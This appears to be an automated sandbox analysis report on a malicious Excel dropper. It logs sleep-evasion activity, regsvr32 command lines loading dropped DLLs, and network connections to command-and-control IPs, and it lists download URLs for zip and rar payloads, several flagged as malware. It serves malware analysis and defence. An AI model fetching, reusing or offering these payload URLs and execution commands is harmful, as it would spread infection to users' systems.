Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -341000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -151000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -164000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -357000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -169000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -147000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -328000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -134000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -162000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -345000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -132000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep count: 55 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2812 Thread sleep time: -960000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -166000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -130000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -132000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -310000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -143000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -178000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -155000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -253000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -316000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -164000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -312000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -125000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -128000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -167000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -278000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -270000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -291000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -150000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -161000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -151000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -252000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -173000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -138000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -146000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -293000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep count: 55 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1440 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -290000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -135000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -174000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -359000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -175000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -130000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -314000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -272000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -142000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -159000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -328000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -132000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -140000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -330000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -166000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -144000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -282000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -179000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -146000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -131000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -353000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -147000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -163000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -123000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep count: 55 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1340 Thread sleep time: -1080000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -124000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -159000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -167000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -291000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -130000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -262000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -332000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -280000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -150000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -163000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -309000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -160000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -147000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -351000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -151000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -168000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -258000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -139000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -161000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -170000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -129000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1340 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep count: 55 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2016 Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep time: -165000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep time: -133000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep time: -149000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep time: -256000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep time: -143000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep time: -128000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep time: -129000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep time: -299000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep time: -167000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep time: -158000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep time: -174000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 Thread sleep count: 55 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2788 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 Thread sleep time: -156000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 Thread sleep time: -140000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 Thread sleep time: -122000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 Thread sleep time: -350000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 Thread sleep time: -145000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 Thread sleep time: -144000s >= -30000s

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 198.57.200.100 202
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 69.164.207.140 60
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 211.110.44.63 233
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 194.225.58.214 187
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: regsvr32.exe, 00000004.00000002.2400095571.00000000008F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: regsvr32.exe, 00000004.00000002.2400095571.00000000008F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000004.00000002.2400095571.00000000008F0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the installation date of Windows
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph (graph image not recoverable; node data from the graph follows)

Behavior Graph ID: 342170
Sample: printouts of outstanding as...
Startdate: 20/01/2021
Architecture: WINDOWS
Score: 100

Sample-level signatures:
  • Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  • Antivirus detection for URL or domain
  • Multi AV Scanner detection for submitted file
  • 8 other signatures

Process tree:
  • EXCEL.EXE (244 70) started
    DNS/IP: bafnabrotherskesarwala.com 103.11.153.223, 49166, 80 WEBWERKS-AS-INWebWerksIndiaPvtLtdIN India; salaodigitalautomovel.pt.deve.pt 185.32.190.115, 49181, 80 PTSERVIDORPT Portugal; 6 other IPs or domains
    Dropped: C:\Users\user\AppData\Local\...\zsijkwsd.dll (PE32); C:\Users\user\AppData\Local\...\zlgzuxvz.dll (PE32); C:\Users\user\AppData\Local\Temp\ogsit.dll (PE32); 5 other malicious files
    Signatures: Document exploit detected (creates forbidden files); Document exploit detected (process start blacklist hit); Document exploit detected (UrlDownloadToFile)
    Started: regsvr32.exe; regsvr32.exe; regsvr32.exe; 11 other processes
      • regsvr32.exe (child of the first regsvr32.exe) started
        Signature: System process connects to network (likely due to code injection or exploit)
      • regsvr32.exe 9 (child of the second regsvr32.exe) started
        DNS/IP: 194.225.58.214, 443, 49170, 49171 TUMS-IR-ASIR Iran (ISLAMIC Republic Of)
      • regsvr32.exe 11 (child of the third regsvr32.exe) started
        DNS/IP: 198.57.200.100, 3786, 49177, 49180 UNIFIEDLAYER-AS-1US United States; 211.110.44.63, 49173, 49174, 49182 SKB-ASSKBroadbandCoLtdKR Korea Republic of; 69.164.207.140, 3388, 49175, 49178 LINODE-APLinodeLLCUS United States
      • regsvr32.exe 9, regsvr32.exe 9, regsvr32.exe (children of the 11 other processes) started

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
185.32.190.115 | unknown | Portugal | 62416 | PTSERVIDORPT | false
85.17.252.207 | unknown | Netherlands | 60781 | LEASEWEB-NL-AMS-01NetherlandsNL | false
103.11.153.223 | unknown | India | 133296 | WEBWERKS-AS-INWebWerksIndiaPvtLtdIN | false
46.28.239.13 | unknown | Turkey | 42910 | PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR | false
198.57.200.100 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1US | true
69.164.207.140 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | true
211.110.44.63 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true
192.185.147.185 | unknown | United States | 26337 | OIS1US | false
132.148.96.144 | unknown | United States | 398101 | GO-DADDY-COM-LLCUS | false
64.37.52.138 | unknown | United States | 33182 | DIMENOCUS | false
194.225.58.214 | unknown | Iran (ISLAMIC Republic Of) | 43965 | TUMS-IR-ASIR | true

Contacted Domains

Name | IP | Active
bafnabrotherskesarwala.com | 103.11.153.223 | true
salaodigitalautomovel.pt.deve.pt | 185.32.190.115 | true
monitrade.net | 192.185.147.185 | true
laureys.be | 85.17.252.207 | true
artec.com.tr | 46.28.239.13 | true
cms.ivpr.org | 64.37.52.138 | true
gastronauts.asia | 132.148.96.144 | true
www.gastronauts.asia | unknown | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://laureys.be/cgi-sys/suspendedpage.cgi | false | Avira URL Cloud: safe | unknown
http://cms.ivpr.org/by9zwa7p1.zip | true | Avira URL Cloud: malware | unknown
http://bafnabrotherskesarwala.com/ys95lm6k.rar | false | Avira URL Cloud: safe | unknown
http://monitrade.net/h79fwesfe.rar | true | Avira URL Cloud: malware | unknown
http://salaodigitalautomovel.pt.deve.pt/d8ms3mljy.zip | true | Avira URL Cloud: malware | unknown
http://www.gastronauts.asia/ylztwx.rar | false | Avira URL Cloud: safe | unknown
http://laureys.be/uzssv27.rar | true | Avira URL Cloud: malware | unknown
http://artec.com.tr/xkpffwn.zip | true | Avira URL Cloud: malware | unknown